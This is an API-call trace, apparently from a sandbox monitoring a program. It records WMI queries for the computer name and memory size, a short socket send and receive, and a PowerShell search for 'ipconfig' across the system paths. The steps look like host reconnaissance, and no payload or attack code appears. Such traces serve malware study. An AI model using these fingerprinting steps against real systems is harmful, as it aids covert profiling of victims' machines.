	[0211.796] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__CLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.796] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0211.796] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.797] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__DYNASTY", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.797] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0211.797] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__RELPATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.797] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0211.797] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.797] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__DERIVATION", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b88bbd0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b88d4c0, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c68ccdc*=8200, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.798] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__SERVER", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.798] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0211.798] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.798] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0211.798] IWbemClassObject:Get (in: This=0x1cc40950, wszName="__PATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0211.798] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0211.798] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc3dcd0, puCount=0x1c68cd80 | out: puCount=0x1c68cd80*=0x2) returned 0x0
	[0211.798] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cd80*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd80*=0x17, pszText=0x0) returned 0x0
	[0211.798] WbemDefPath:IWbemPath:GetText (in: This=0x1cc3dcd0, lFlags=4, puBuffLength=0x1c68cd80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.798] IWbemClassObject:Get (in: This=0x1cc40950, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x1c68cd70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd6c*=0, plFlavor=0x1c68cd68*=0 | out: pVal=0x1c68cd70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x1c68cd6c*=21, plFlavor=0x1c68cd68*=32) returned 0x0
	[0211.799] SysStringLen (param_1="2146942976") returned 0xa
	[0211.799] IWbemClassObject:Get (in: This=0x1cc40950, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x1c68cfa0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cf9c*=21, plFlavor=0x1c68cf98*=32 | out: pVal=0x1c68cfa0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x1c68cf9c*=21, plFlavor=0x1c68cf98*=32) returned 0x0
	[0211.799] SysStringLen (param_1="2146942976") returned 0xa
	[0211.805] send (s=0x408, buf=0x30d8af8*, len=57, flags=0) returned 57
	[0211.806] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 176
	[0211.813] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0211.819] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0211.819] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0211.819] CoTaskMemFree (pv=0x1b87def0) 
	[0211.823] CoTaskMemAlloc (cb=0x104) returned 0x1b87def0
	[0211.823] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b87def0, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0211.823] CoTaskMemFree (pv=0x1b87def0) 
	[0211.823] CoTaskMemAlloc (cb=0x128) returned 0x1b8906a0
	[0211.823] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b8906a0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0211.823] CoTaskMemFree (pv=0x1b8906a0) 
	[0211.829] CoTaskMemAlloc (cb=0x20e) returned 0x1b82a4c0
	[0211.829] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b82a4c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0211.829] CoTaskMemFree (pv=0x1b82a4c0) 
	[0212.070] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.072] SetErrorMode (uMode=0x1) returned 0x1
	[0212.078] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.ps1", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.096] SetErrorMode (uMode=0x1) returned 0x1
	[0212.099] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.099] SetErrorMode (uMode=0x1) returned 0x1
	[0212.099] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.psm1", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.113] SetErrorMode (uMode=0x1) returned 0x1
	[0212.351] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.351] SetErrorMode (uMode=0x1) returned 0x1
	[0212.352] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.psd1", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.363] SetErrorMode (uMode=0x1) returned 0x1
	[0212.366] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.366] SetErrorMode (uMode=0x1) returned 0x1
	[0212.366] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.COM", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.377] SetErrorMode (uMode=0x1) returned 0x1
	[0212.378] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.379] SetErrorMode (uMode=0x1) returned 0x1
	[0212.379] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.EXE", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.391] SetErrorMode (uMode=0x1) returned 0x1
	[0212.393] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.393] SetErrorMode (uMode=0x1) returned 0x1
	[0212.394] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.BAT", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.630] SetErrorMode (uMode=0x1) returned 0x1
	[0212.632] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.632] SetErrorMode (uMode=0x1) returned 0x1
	[0212.632] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.CMD", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.648] SetErrorMode (uMode=0x1) returned 0x1
	[0212.650] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.650] SetErrorMode (uMode=0x1) returned 0x1
	[0212.650] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.VBS", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.946] SetErrorMode (uMode=0x1) returned 0x1
	[0212.949] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.949] SetErrorMode (uMode=0x1) returned 0x1
	[0212.949] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.VBE", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.964] SetErrorMode (uMode=0x1) returned 0x1
	[0212.966] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.966] SetErrorMode (uMode=0x1) returned 0x1
	[0212.966] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.JS", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.983] SetErrorMode (uMode=0x1) returned 0x1
	[0212.986] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.986] SetErrorMode (uMode=0x1) returned 0x1
	[0212.986] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.JSE", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.413] SetErrorMode (uMode=0x1) returned 0x1
	[0213.415] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.415] SetErrorMode (uMode=0x1) returned 0x1
	[0213.416] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.WSF", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.432] SetErrorMode (uMode=0x1) returned 0x1
	[0213.434] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.434] SetErrorMode (uMode=0x1) returned 0x1
	[0213.434] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.WSH", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.670] SetErrorMode (uMode=0x1) returned 0x1
	[0213.672] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.673] SetErrorMode (uMode=0x1) returned 0x1
	[0213.673] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.MSC", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.692] SetErrorMode (uMode=0x1) returned 0x1
	[0213.695] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0213.695] SetErrorMode (uMode=0x1) returned 0x1
	[0213.695] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.991] SetErrorMode (uMode=0x1) returned 0x1
	[0213.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.994] SetErrorMode (uMode=0x1) returned 0x1
	[0213.994] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.ps1", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.995] SetErrorMode (uMode=0x1) returned 0x1
	[0213.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.996] SetErrorMode (uMode=0x1) returned 0x1
	[0213.996] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.psm1", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.997] SetErrorMode (uMode=0x1) returned 0x1
	[0213.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.997] SetErrorMode (uMode=0x1) returned 0x1
	[0213.997] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\ipconfig.psd1", lpFindFileData=0x1c68c5e0 | out: lpFindFileData=0x1c68c5e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0213.998] SetErrorMode (uMode=0x1) returned 0x1
	[0213.998] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c68c440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0213.999] SetErrorMode (uMode=0x1) returned 0x1
